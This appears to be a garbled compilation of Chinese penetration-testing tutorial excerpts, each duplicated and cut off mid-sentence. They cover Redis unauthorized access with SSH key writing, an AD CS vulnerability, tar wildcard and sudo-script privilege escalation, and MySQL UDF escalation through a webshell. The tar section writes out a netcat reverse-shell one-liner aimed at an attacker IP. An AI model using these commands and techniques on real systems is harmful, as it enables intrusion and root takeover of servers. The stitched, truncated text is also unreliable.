一、介绍1.Redis数据库Redis（RemoteDictionaryServer)，即远程字典服务，是一个开源的使用ANSIC语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。2.漏洞介绍Redis因配置不当可以导致未授权访问，被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式，在特定条件下，如果Redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器，可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生，严重危害业务正常服务。漏洞产生条件：（1）redis绑定在0.0.0

一、介绍1.Redis数据库Redis（RemoteDictionaryServer)，即远程字典服务，是一个开源的使用ANSIC语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。2.漏洞介绍Redis因配置不当可以导致未授权访问，被攻击者恶意利用。当前流行的针对Redis未授权访问的一种新型攻击方式，在特定条件下，如果Redis以root身份运行，黑客可以给root账户写入SSH公钥文件，直接通过SSH登录受害服务器，可导致服务器权限被获取和数据删除、泄露或加密勒索事件发生，严重危害业务正常服务。漏洞产生条件：（1）redis绑定在0.0.0

前言ActiveDirectory域服务，是一种目录服务，提供了存储目录数据信息以及用户相关的一些密码，电话号码等等一些数据信息，且可让用户和管理员使用这些数据，有利于域管理员对用户的数据信息进行管理。ADCS(ActiveDirectoryCertipyServer)是允许你构建公钥基础机构(PKI)并为你的组织提供公钥加密、数字证书和数字签名功能的服务器角色。漏洞影响范围Windows8.1Windows10Version1607,1809,1909,2004,20H2,21H1,21H2Windows11WindowsServer2008，2012，2016，2019，2022环境搭建k

前言ActiveDirectory域服务，是一种目录服务，提供了存储目录数据信息以及用户相关的一些密码，电话号码等等一些数据信息，且可让用户和管理员使用这些数据，有利于域管理员对用户的数据信息进行管理。ADCS(ActiveDirectoryCertipyServer)是允许你构建公钥基础机构(PKI)并为你的组织提供公钥加密、数字证书和数字签名功能的服务器角色。漏洞影响范围Windows8.1Windows10Version1607,1809,1909,2004,20H2,21H1,21H2Windows11WindowsServer2008，2012，2016，2019，2022环境搭建k

以普通用户进入目标机后，若是可以运行tar指令，则可以通过以下的方法进行提权原理：tar有通配符*的漏洞，tar用通配符来压缩文件并读取文件名，若是看到有参数则将执行。 操作：1.先cd到一个用户有完全执行命令的文件夹下例如：www-data用户的完全权限文件夹为/var/www/html 2.创建一个reverseshell脚本echo'rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|ncyou_ip1234>/tmp/f'>shell.shyou_ip为本机IP地址1234为将要监听的端口 3.创建tar将要运行的参数touch"/var/www

以普通用户进入目标机后，若是可以运行tar指令，则可以通过以下的方法进行提权原理：tar有通配符*的漏洞，tar用通配符来压缩文件并读取文件名，若是看到有参数则将执行。 操作：1.先cd到一个用户有完全执行命令的文件夹下例如：www-data用户的完全权限文件夹为/var/www/html 2.创建一个reverseshell脚本echo'rm/tmp/f;mkfifo/tmp/f;cat/tmp/f|/bin/sh-i2>&1|ncyou_ip1234>/tmp/f'>shell.shyou_ip为本机IP地址1234为将要监听的端口 3.创建tar将要运行的参数touch"/var/www

以普通用户登入后，先sudo-l 看看有什么具有root权限、且普通用户可以写入的脚本例：A.sh 该类脚本普通用户是启动不了的，但可以通过链式脚本启动例：存在脚本B.sh，其内部为：#!/usr/bin/perlsystem("sh","/etc/A.sh");即可以通过/usr/bin/perl来启动B脚本，然后B脚本又会启动A脚本 A、B脚本对于普通用户一般为：　　A可以写入且具有root权限，但不可执行　　B可以免密执行但不可写入 所以最重要的是找到这条链，并修改A脚本，最后执行B脚本 在找到A脚本后就可以通过两种方法来提取： 1.修改脚本来切换shell获取root权限的方法： 原理

以普通用户登入后，先sudo-l 看看有什么具有root权限、且普通用户可以写入的脚本例：A.sh 该类脚本普通用户是启动不了的，但可以通过链式脚本启动例：存在脚本B.sh，其内部为：#!/usr/bin/perlsystem("sh","/etc/A.sh");即可以通过/usr/bin/perl来启动B脚本，然后B脚本又会启动A脚本 A、B脚本对于普通用户一般为：　　A可以写入且具有root权限，但不可执行　　B可以免密执行但不可写入 所以最重要的是找到这条链，并修改A脚本，最后执行B脚本 在找到A脚本后就可以通过两种方法来提取： 1.修改脚本来切换shell获取root权限的方法： 原理

实验环境：windows下已获得低权限的webshell（apache服务不使用phpstudy运行），mysql版本为5.5.29如果版本号>5.1.4上传udf的位置应该放在mysql\lib\plugin（如果不存在目录自己新建一个），如果版本 0x00 提权条件1.必须是root权限（需要创建和抛弃自定义函数）2.secure_file_priv=（必须为空，secure_file_priv为null或者为/tmp/都不行，因为它需要在指定的位置写入udf文件） 0x01数据库密码获取使用菜刀连接webshell，执行whoami为user的普通权限，执行netuser添加用户拒绝访问

实验环境：windows下已获得低权限的webshell（apache服务不使用phpstudy运行），mysql版本为5.5.29如果版本号>5.1.4上传udf的位置应该放在mysql\lib\plugin（如果不存在目录自己新建一个），如果版本 0x00 提权条件1.必须是root权限（需要创建和抛弃自定义函数）2.secure_file_priv=（必须为空，secure_file_priv为null或者为/tmp/都不行，因为它需要在指定的位置写入udf文件） 0x01数据库密码获取使用菜刀连接webshell，执行whoami为user的普通权限，执行netuser添加用户拒绝访问